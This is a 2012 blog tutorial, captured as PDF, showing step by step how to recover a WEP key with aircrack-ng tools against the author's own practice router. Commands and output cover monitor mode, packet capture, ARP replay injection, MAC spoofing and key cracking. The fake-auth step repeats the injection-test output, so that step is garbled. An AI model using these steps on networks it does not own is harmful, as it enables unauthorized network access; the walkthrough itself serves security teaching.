WEP Cracking (The Manual Way) E-Spohn

http://e-spohn.com/blog/2012/05/22/wep-cracking-the-manual-way/

Site of Spoonman

E-Spohn
Home About
MS11-080: Privilege Escalation (Windows) WEP Cracking (Automated)

Search

GO

SECURITY
AV Bypass Client-Side Exploitation Exploit Development Local Privilege Escalation Man-In-The-Middle Python Scripting Remote Exploitation Wireless Hacking

WEP Cracking (The Manual Way)

Its been a while since Ive updated this blog, and since one of the last subjects we covered last year at OSOC was wireless hacking, I figured I would start back up with a simple WEP cracking walkthrough. As usual, Im using BackTrack (BT5 R2, 64-bit) in a Virtual Machine (VM) as my preferred hacking environment. My USB Wireless NIC of choice is an Alpha Network, Model: AWUS036h. A USB Wireless NIC is required for hacking wireless networks using a VM because the wireless NIC drivers on the PCI bus of the host system are virtualized drivers that are shared with the guest system, so there is no direct access to the radio. This NIC also has quite an extended range compared to any built-in wireless NIC you may have. If you have any trouble getting your NIC to work properly, there are some workarounds to try on Offenseive Securitys site. Now, I dont think I can do any better than the thousands of other WEP cracking tutorials out there, but Im going to loosely walk through a tutorial on Mr. Xs site (the man who wrote the aircrack-ng tools) anyway. There are also some good troubleshooting steps on his site if you have any problems with the exercise. First we need to setup a wireless router that we can practice on. I used an old Linksys WRT54GL that was laying around, and configured it to use WEP with a S3cretP@ssword.

SECURITY BLOGS
Console-Cowboys g0tmi1k Metasploit Microsoft Security Research & Defense Noodle on This Room 362 Security Shell TrustedSec

SECURITY LINKS
BackTrack Linux Cleveland Toool Exploit Database Metasploit Unleashed Northeast Ohio Information Security Blog Offensive-Security Offensive-Security Ohio Chapter Pentest Bookmarks Pentest Standard Security Tube Social Engineering Vulnerable By Design

SECURITY PODCASTS
Exotic Liability Hak5 Infosec Daily Podcast Network Security Podcast PaulDotCom Security Weekly Risky Business Securabit Social Media Security Social-Engineer

ARCHIVES
To recover a WEP key, we first need to be able to capture an ARP request, so were going to create a continuous stream of ARP requests by connecting another computer to the access point and simply starting a ping loop to a non-existent address. June 2013 (2) May 2013 (1) August 2012 (1) July 2012 (1) May 2012 (2) December 2011 (1) July 2011 (1) June 2011 (1) April 2011 (1) March 2011 (1) January 2011 (1) December 2010 (3)

META
Log in Valid XHTML Now, on to the cracking! Here are the tools we are going to use: 1. airmon-ng used to configure the wireless NIC for monitor mode 2. airodump-ng used to capture packets 3. aireplay-ng used for packet injection 4. aircrack-ng used to recover the WEP key from the captured packets First, we put our NIC into monitor mode, using airmon-ng and verify it with iwconfig. XFN WordPress

AcroPDF - A Quality PDF Writer and PDF Converter to create PDF. To remove the line, buy a license.
1 de 3 24/10/2013 12:05

WEP Cracking (The Manual Way) E-Spohn

http://e-spohn.com/blog/2012/05/22/wep-cracking-the-manual-way/

root@bt:~# airmon-ng Interface wlan2 Chipset Driver rtl8187 - [phy1]

Realtek RTL8187L

root@bt:~# airmon-ng start wlan2 Interface wlan2 Chipset Driver

Realtek RTL8187L rtl8187 - [phy1] (monitor mode enabled on mon0)

root@bt:~# iwconfig wlan2 IEEE 802.11bg ESSID:off/any Mode:Managed Frequency:2.437 GHz Tx-Power=20 dBm Retry long limit:7 RTS thr:off Encryption key:off Power Management:off lo mon0 no wireless extensions.

Access Point: Not-Associated Fragment thr:off

IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:on no wireless extensions.

eth0

Next, we use airodump-ng to enumerate any wireless networks in the area, utilizing the -t switch to only enumerate the WEP networks.
root@bt:~# airodump-ng -t wep mon0 CH 3 ][ Elapsed: 28 s ][ 2012-05-20 17:00 PWR -35 STATION 00:1B:77:9C:6B:03 Beacons 43 #Data, #/s 16 PWR -24 0 CH 6 MB 54 ENC WEP CIPHER AUTH ESSID WEP Frames 9 donthackme Probe

BSSID 00:13:10:FE:30:CA BSSID 00:13:10:FE:30:CA

Rate 0 - 1

Lost 0

"donthackme" looks like a good ESSID to play with. The top section shows the information for the access point, and the bottom section shows the information for the client that we associated and started the continuous ping. Take note of the MAC address, channel, and ESSID of the access point, as well as the MAC address of the associated client, which will be needed soon. Now we start capturing all packets destined for our access point and save them directly to disk for later cracking.
root@bt:~# airodump-ng --bssid 00:13:10:FE:30:CA -c 6 -w /tmp/donthackme mon0 CH 6 ][ Elapsed: 3 mins ][ 2012-05-20 18:11 PWR RXQ -29 96 Beacons 2050 #Data, #/s 270 PWR 0 0 CH 6 MB 54 ENC WEP CIPHER AUTH ESSID WEP OPN Probe donthackme

BSSID 00:13:10:FE:30:CA BSSID 00:13:10:FE:30:CA

STATION 00:1B:77:9C:6B:03

Rate 54 - 1

Lost 0

Frames 106

Leaving that session running, let's start a new session and verify that our packet injection is works.
root@bt:~# aireplay-ng --test -e "donthackme" -a 00:13:10:FE:30:CA mon0 18:08:47 Waiting for beacon frame (BSSID: 00:13:10:FE:30:CA) on channel 6 18:08:47 Trying broadcast probe requests... 18:08:48 Injection is working! 18:08:49 Found 1 AP 18:08:49 18:08:49 18:08:49 Trying directed probe requests... 00:13:10:FE:30:CA - channel: 6 - 'donthackme' Ping (min/avg/max): 0.748ms/4.226ms/7.905ms Power: -33.60

Next we send a fake "auth" request to associate with the access point so it will accept the packets will soon be injecting.
root@bt:~# aireplay-ng --test -e "donthackme" -a 00:13:10:FE:30:CA mon0 18:08:47 Waiting for beacon frame (BSSID: 00:13:10:FE:30:CA) on channel 6 18:08:47 Trying broadcast probe requests... 18:08:48 Injection is working! 18:08:49 Found 1 AP 18:08:49 18:08:49 18:08:49 Trying directed probe requests... 00:13:10:FE:30:CA - channel: 6 - 'donthackme' Ping (min/avg/max): 0.748ms/4.226ms/7.905ms Power: -33.60

Now we can start replaying ARP requests captured within our airodump-ng session and send them back to the access point at an accelerated rate to generate the needed IV's (Initialization Vectors) for cracking.
root@bt:~# aireplay-ng --arpreplay -b 00:13:10:FE:30:CA -h 00:1B:77:9C:6B:03 mon0 The interface MAC (00:C0:CA:53:09:1D) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 00:1B:77:9C:6B:03 18:18:42 Waiting for beacon frame (BSSID: 00:13:10:FE:30:CA) on channel 6 Saving ARP requests in replay_arp-0520-181842.cap You should also start airodump-ng to capture replies. ^Cad 38834 packets (got 13912 ARP requests and 12752 ACKs), sent 14647 packets...(499 pps)

When the "Data" column of our airodump-ng session hits about 10,000, we should have a sufficient amount of IV's.
CH 6 ][ Elapsed: 11 mins ][ 2012-05-20 18:19 PWR RXQ -40 84 Beacons 6471 #Data, #/s 10655 PWR 0 361 CH 6 MB 54 ENC WEP CIPHER AUTH ESSID WEP OPN Probe donthackme

BSSID 00:13:10:FE:30:CA BSSID 00:13:10:FE:30:CA

STATION 00:1B:77:9C:6B:03

Rate 54 - 1

Lost 1473

Frames 27501

Finally, we can stop our airodump-ng session and start cracking.

root@bt:~# aircrack-ng -b 00:13:10:FE:30:CA /tmp/donthackme*.cap Opening /tmp/donthackme-01.cap Attack will be restarted every 5000 captured ivs.

AcroPDF - A Quality PDF Writer and PDF Converter to create PDF. To remove the line, buy a license.
2 de 3 24/10/2013 12:05

WEP Cracking (The Manual Way) E-Spohn

http://e-spohn.com/blog/2012/05/22/wep-cracking-the-manual-way/

Starting PTW attack with 10684 ivs. Aircrack-ng 1.1 r2076 [00:00:01] Tested 102216 keys (got 10542 IVs) KB 0 1 2 3 4 depth 0/ 14 0/ 1 21/ 52 7/ 11 0/ 14 byte(vote) F2(16640) DD(15360) C7(19456) 7F(15104) BB(12800) D3(12800) D4(14080) 2A(13824) B9(16384) 2F(15616)

CC(15104) 08(14848) EF(12800) 30(13824) 48(14336)

C5(14592) 22(14336) 33(12800) A9(13824) D2(14080)

26(13824) 88(14336) 4A(12544) 00(13568) 00(14080)

29(13824) 8F(14336) 64(12544) 4A(13568) 1F(14080)

C7(13824) B6(14080) 68(12544) 82(13568) DE(13824)

7D(13568) 2F(13568) 72(12544) F2(13568) FB(13824)

D1(13568) 7A(13568) 9B(12544) FA(13568) 70(13568)

F3(13568) 9B(13568) AC(12544) 38(13312) C9(13568)

KEY FOUND! [ F2:C7:BB:35:B9 ] Decrypted correctly: 100%

Key found! Lets see if it works. We start up our wireless daemon and our wireless client.
root@bt:~# wicd root@bt:~# wicd-client & [1] 32614 root@bt:~# Has notifications support True Loading... Connecting to daemon... Connected. displaytray True Done loading.

Then we just click on the icon in the system tray and configure it with the key that we found.

Click connect and hope for the best.

Success! That was easy enough, huh?

This entry was posted on May 22, 2012, 8:43 pm and is filed under Wireless Hacking. You can follow any responses to this entry through RSS 2.0. Both comments and pings are currently closed.

Comments are closed.

Fusion theme by digitalnature | powered by WordPress Entries (RSS) and Comments (RSS) ^

AcroPDF - A Quality PDF Writer and PDF Converter to create PDF. To remove the line, buy a license.
3 de 3 24/10/2013 12:05